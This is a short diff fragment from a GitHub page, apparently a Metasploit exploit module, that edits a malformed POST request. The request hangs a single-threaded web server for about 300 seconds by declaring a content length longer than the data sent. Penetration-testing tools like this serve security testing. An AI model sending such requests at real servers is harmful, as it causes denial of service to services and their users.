You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
print_status("Sending malformed POST request at #{time.strftime("%Y-%m-%d %H:%M:%S")}. Server will recover about #{(time + 300).strftime("%Y-%m-%d %H:%M:%S")}")
46
-
# This request will set DoS the server for ~300 seconds
46
+
# The web server is single threaded, and when the content length is longer than the data, it will continue to wait
47
+
# for the rest of the data, which never comes, and times out after ~300 seconds.
48
+
data=Rex::Text.rand_text_alphanumeric(40)
47
49
send_request_cgi({
48
50
'method'=>'POST',
49
51
'uri'=>'/',
50
-
'data'=>'asdasdasdasdasdasdasd',
52
+
'data'=>data,#'asdasdasdasdasdasdasd',
51
53
'headers'=>{
52
54
# These are kept here since they were in the original exploit, however they are not required
0 commit comments